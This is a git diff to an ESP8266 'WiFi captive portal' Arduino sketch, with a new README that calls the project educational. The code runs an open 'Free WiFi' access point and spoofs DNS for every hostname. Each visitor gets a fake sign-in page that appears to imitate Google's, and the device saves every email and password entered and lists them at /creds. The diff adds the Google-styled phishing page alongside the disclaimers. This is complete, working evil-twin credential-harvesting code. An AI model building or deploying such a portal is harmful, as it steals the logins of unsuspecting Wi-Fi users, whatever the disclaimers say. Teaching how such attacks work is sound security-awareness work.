diff --git a/ESP8266_WiFi_Captive_Portal_2.0.ino b/ESP8266_WiFi_Captive_Portal_2.0.ino index 5519258..597fa8e 100644 --- a/ESP8266_WiFi_Captive_Portal_2.0.ino +++ b/ESP8266_WiFi_Captive_Portal_2.0.ino @@ -1,6 +1,27 @@ // ESP8266 WiFi Captive Portal // By 125K (github.com/125K) // LittleFS functionality by dsfifty 16 Nov 2022 +// Modified to include new index HTML + +//! This project is prepared ONLY for educational and teaching purposes. Malicious use in real environments is strictly prohibited! + +/* +! DO: + +! Teach security awareness +! Use in controlled educational environments +! Demonstrate attack vectors for defense +! Obtain explicit permission before testing +! Follow responsible disclosure practices + +! DON'T: + +! Use against real users without consent +! Deploy in public networks +! Harvest actual credentials +! Use for financial gain +! Ignore local laws and regulations +*/ // Includes #include @@ -18,7 +39,7 @@ #define PASS_TITLE "Credentials" #define CLEAR_TITLE "Cleared" -//function prototypes +// function prototypes void readData(); void writeData(String data); void deleteData(); @@ -27,7 +48,7 @@ void deleteData(); const byte HTTP_CODE = 200; const byte DNS_PORT = 53; const byte TICK_TIMER = 1000; -IPAddress APIP(172, 0, 0, 1); // Gateway +IPAddress APIP(172, 0, 0, 1); // Gateway String data = ""; String Credentials = ""; @@ -38,7 +59,8 @@ unsigned long bootTime = 0, lastActivity = 0, lastTick = 0, tickCtr = 0; DNSServer dnsServer; ESP8266WebServer webServer(80); -String input(String argName) { +String input(String argName) +{ String a = webServer.arg(argName); a.replace("<", "<"); a.replace(">", ">"); @@ -46,42 +68,171 @@ String input(String argName) { return a; } -String footer() { return - "
© All rights reserved.
"; +String footer() +{ + return "
© All rights reserved.
"; } -String header(String t) { +String header(String t) +{ String a = String(SSID_NAME); - String CSS = "article { background: #f2f2f2; padding: 1.3em; }" - "body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }" - "div { padding: 0.5em; }" - "h1 { margin: 0.5em 0 0 0; padding: 0.5em; }" - "input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; }" - "label { color: #333; display: block; font-style: italic; font-weight: bold; }" - "nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }" - "nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; } " - "textarea { width: 100%; }"; + String CSS = "article { background: #f2f2f2; padding: 1.3em; }" + "body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }" + "div { padding: 0.5em; }" + "h1 { margin: 0.5em 0 0 0; padding: 0.5em; }" + "input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; }" + "label { color: #333; display: block; font-style: italic; font-weight: bold; }" + "nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }" + "nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; } " + "textarea { width: 100%; }"; String h = "" - ""+a+" :: "+t+"" - "" - "" - "

"+t+"

"; - return h; } + "" + + a + " :: " + t + "" + "" + "" + "

" + t + "

"; + return h; +} -String creds() { +String creds() +{ return header(PASS_TITLE) + "
    " + Credentials + "

Back to Index

Clear passwords

" + footer(); } -String index() { - return header(TITLE) + "
" + BODY + "
" + - "Email:
" + - "Password:
" + footer(); +String index() +{ + return "\n" + "\n" + " \n" + " \n" + " Free WiFi – Sign in\n" + " \n" + " \n" + " \n" + " \n" + " \n" + "
\n" + " \n" + " G\n" + " o\n" + " o\n" + " g\n" + " l\n" + " e\n" + " \n" + "

Sign in

\n" + "

to continue to wifi

\n" + "
\n" + " \n" + " \n" + " \n" + " \n" + " \n" + " \n" + "
\n" + "
© All rights reserved.
\n" + " \n" + ""; } -String posted() { +String posted() +{ String email = input("email"); String password = input("password"); - readData(); //retrieves saved data and adds the new data. The data variable is updated and saved again to LittleFS + readData(); // retrieves saved data and adds the new data. The data variable is updated and saved again to LittleFS Credentials = data + "
  • Email: " + email + "
    Password: " + password + "
    • "; data = Credentials; writeData(data); @@ -89,19 +240,22 @@ String posted() { return header(POST_TITLE) + POST_BODY + footer(); } -String clear() { +String clear() +{ String email = "

    "; String password = "

    "; Credentials = "

    "; data = ""; savedData = 0; - deleteData(); //deletes the file from LittleFS + deleteData(); // deletes the file from LittleFS return header(CLEAR_TITLE) + "

    The credentials list has been reset.

    Back to Index
    " + footer(); } -void BLINK() { // The internal LED will blink 5 times when a password is received. +void BLINK() +{ // The internal LED will blink 5 times when a password is received. int count = 0; - while (count < 5) { + while (count < 5) + { digitalWrite(LED_BUILTIN, LOW); delay(500); digitalWrite(LED_BUILTIN, HIGH); @@ -110,95 +264,105 @@ void BLINK() { // The internal LED will blink 5 times when a password is receiv } } -void readData() //reads the file from LittleFS and returns as the string variable called: data +void readData() // reads the file from LittleFS and returns as the string variable called: data { - //Open the file + // Open the file File file = LittleFS.open("/SavedFile.txt", "r"); - //Check if the file exists - if (!file) { + // Check if the file exists + if (!file) + { return; } - data = ""; //setup for data read + data = ""; // setup for data read int i = 0; char myArray[1000]; - while (file.available()) { - - myArray[i] = (file.read()); //file is read one character at a time into the char array + while (file.available()) + { + myArray[i] = (file.read()); // file is read one character at a time into the char array i++; } - myArray[i] = '\0'; //a null is added at the end - //Close the file + myArray[i] = '\0'; // a null is added at the end + // Close the file file.close(); - data = String(myArray); //convert the array into a string ready for return - if (data != ""){ - savedData=1; + data = String(myArray); // convert the array into a string ready for return + if (data != "") + { + savedData = 1; } } -void writeData(String data) { - //Open the file +void writeData(String data) +{ + // Open the file File file = LittleFS.open("/SavedFile.txt", "w"); - //Write to the file + // Write to the file file.print(data); delay(1); - //Close the file + // Close the file file.close(); } -void deleteData() { - //Remove the file +void deleteData() +{ + // Remove the file LittleFS.remove("/SavedFile.txt"); } -void setup() { +void setup() +{ bootTime = lastActivity = millis(); WiFi.mode(WIFI_AP); WiFi.softAPConfig(APIP, APIP, IPAddress(255, 255, 255, 0)); WiFi.softAP(SSID_NAME); - dnsServer.start(DNS_PORT, "*", APIP); // DNS spoofing (Only HTTP) - webServer.on("/post", []() { + dnsServer.start(DNS_PORT, "*", APIP); // DNS spoofing (Only HTTP) + webServer.on("/post", []() + { webServer.send(HTTP_CODE, "text/html", posted()); - BLINK(); - }); - webServer.on("/creds", []() { - webServer.send(HTTP_CODE, "text/html", creds()); - }); - webServer.on("/clear", []() { - webServer.send(HTTP_CODE, "text/html", clear()); - }); - webServer.onNotFound([]() { + BLINK(); }); + webServer.on("/creds", []() + { webServer.send(HTTP_CODE, "text/html", creds()); }); + webServer.on("/clear", []() + { webServer.send(HTTP_CODE, "text/html", clear()); }); + webServer.onNotFound([]() + { lastActivity = millis(); - webServer.send(HTTP_CODE, "text/html", index()); - }); + webServer.send(HTTP_CODE, "text/html", index()); }); webServer.begin(); pinMode(LED_BUILTIN, OUTPUT); digitalWrite(LED_BUILTIN, HIGH); Serial.begin(115200); - //LittleFS set up - if (!LittleFS.begin()) { + // LittleFS set up + if (!LittleFS.begin()) + { Serial.println("An Error has occurred while mounting LittleFS"); delay(1000); return; } - //Read the saved data every boot + // Read the saved data every boot readData(); - } - -void loop() { - if ((millis() - lastTick) > TICK_TIMER) { lastTick = millis(); } +void loop() +{ + if ((millis() - lastTick) > TICK_TIMER) + { + lastTick = millis(); + } dnsServer.processNextRequest(); webServer.handleClient(); i++; Serial.println(i); Serial.println(savedData); - if (i == timer && savedData == 1) { + if (i == timer && savedData == 1) + { i = 0; digitalWrite(LED_BUILTIN, LOW); delay(50); digitalWrite(LED_BUILTIN, HIGH); } - if (i > timer) { i = 0; } + if (i > timer) + { + i = 0; + } } \ No newline at end of file diff --git a/README_Forked.md b/README_Forked.md new file mode 100644 index 0000000..65514e4 --- /dev/null +++ b/README_Forked.md @@ -0,0 +1,193 @@ +# ESP8266 WiFi Captive Portal - Educational Project + +## ⚠️ IMPORTANT WARNING + +**This project is prepared ONLY for educational and teaching purposes. Malicious use in real environments is strictly prohibited!** + +## 📚 About The Project + +This project is developed to learn how captive portal systems work using the ESP8266 microcontroller. It aims to help students gain experience in network security, web technologies, and IoT devices through hands-on learning. + +## 🎯 Learning Objectives + +- Understanding ESP8266 WiFi capabilities +- Comprehending captive portal technology +- Learning DNS spoofing concepts +- Web server programming +- HTML/CSS form handling +- File system (LittleFS) usage +- Network security awareness + +## 🔧 Technical Features + +- **Platform**: ESP8266 +- **Web Server**: ESP8266WebServer +- **DNS Server**: DNSServer library +- **File System**: LittleFS +- **Interface**: Modern HTML/CSS design +- **Data Storage**: Local file system + +## 📋 Requirements + +### Hardware +- ESP8266 development board (NodeMCU, Wemos D1 Mini, etc.) +- USB cable +- Computer + +### Software +- Arduino IDE +- ESP8266 Arduino Core +- Required libraries: + - ESP8266WiFi + - DNSServer + - ESP8266WebServer + - LittleFS + +## 🚀 Installation + +1. **Prepare Arduino IDE** + - Install ESP8266 board package + - Add required libraries + +2. **Download the code** + ```bash + git clone https://github.com/photomanai/ESP8266_WiFi_Captive_Portal + ``` + +3. **Upload to ESP8266** + - Open code in Arduino IDE + - Select correct board and port + - Compile and upload + +## 💡 How It Works + +1. ESP8266 creates an Access Point named "Free WiFi" +2. When users connect to this network, a captive portal page opens +3. When user enters credentials, the system saves them to LittleFS +4. For educational purposes, LED blinks and data is stored + +## 🔍 Educational Content + +### Security Topics +- How captive portal attacks work +- Risks of connecting to unsecured networks +- Technical details of phishing attacks +- Social engineering techniques + +### Technical Concepts +- DNS spoofing mechanism +- HTTP server programming +- Access Point creation +- Embedded web interface design + +## ⚖️ Legal Notice and Disclaimer + +### 🚫 DISCLAIMER OF LIABILITY + +This code and project: + +- Is prepared **ONLY FOR EDUCATIONAL PURPOSES** +- Is developed to create awareness about network security +- **Malicious use in real environments is PROHIBITED** +- **Should NOT be used to steal others' data** +- Is intended for controlled learning environments only + +### 📝 USER RESPONSIBILITIES + +Persons using this code: +- Must comply with local laws and regulations +- Should only use in their own test environments +- Must not test on others' networks without permission +- Should not use obtained information for malicious purposes +- Are responsible for ensuring ethical use + +### 🛡️ DEVELOPER RESPONSIBILITY + +**As the developer:** +- I am **NOT RESPONSIBLE** for malicious use of this code +- I am **NOT LIABLE** for any damage, legal issues, or consequences arising from misuse of this educational project +- Users are entirely responsible for how they use this code +- I developed this project solely for learning and teaching purposes +- Any use beyond educational scope is at the user's own risk and responsibility + +## 🎓 Educational Use + +### Recommended Use Cases: +- University network security courses +- Cybersecurity training programs +- IoT security workshops +- Ethical hacking courses +- Technical high school electronics classes +- Security awareness training + +### Laboratory Environment: +- Use in isolated test networks +- Do not test with real user data +- Emphasize security awareness to students +- Obtain proper permissions before any testing + +## 🔒 Ethical Guidelines + +### DO: +- Use in controlled educational environments +- Teach security awareness +- Demonstrate attack vectors for defense +- Obtain explicit permission before testing +- Follow responsible disclosure practices + +### DON'T: +- Use against real users without consent +- Deploy in public networks +- Harvest actual credentials +- Use for financial gain +- Ignore local laws and regulations + +## 🤝 Contributing + +To improve educational content: +1. Fork the repository +2. Add educational materials +3. Enhance security explanations +4. Submit pull requests +5. Focus on educational value + +## 📚 Resources + +- [ESP8266 Arduino Core Documentation](https://arduino-esp8266.readthedocs.io/) +- [Network Security Fundamentals](https://www.sans.org/) +- [Captive Portal Security](https://owasp.org/) +- [Ethical Hacking Guidelines](https://www.eccouncil.org/) + +## 🛠️ Code Structure + +``` +├── ESP8266_Captive_Portal.ino # Main Arduino sketch +├── README.md # This file +├── LICENSE # License file + +``` + +## 🔍 Security Analysis (Educational) + +This project demonstrates: +- **DNS Spoofing**: How malicious actors redirect DNS queries +- **Evil Twin Attacks**: Creating fake access points +- **Credential Harvesting**: Collecting user input through fake forms +- **Social Engineering**: Using familiar interfaces to deceive users + + +--- + +## ⚠️ FINAL REMINDER + +**This project is strictly for educational purposes. The author disclaims all responsibility for any misuse. Users must:** + +- ✅ Use only in authorized test environments +- ✅ Obtain explicit permission before testing +- ✅ Comply with all applicable laws +- ✅ Use for learning and teaching only +- ❌ Never use against real users without consent +- ❌ Never use for malicious purposes +- ❌ Never deploy in production environments + +**By using this code, you acknowledge that you have read, understood, and agree to these terms and take full responsibility for your actions.**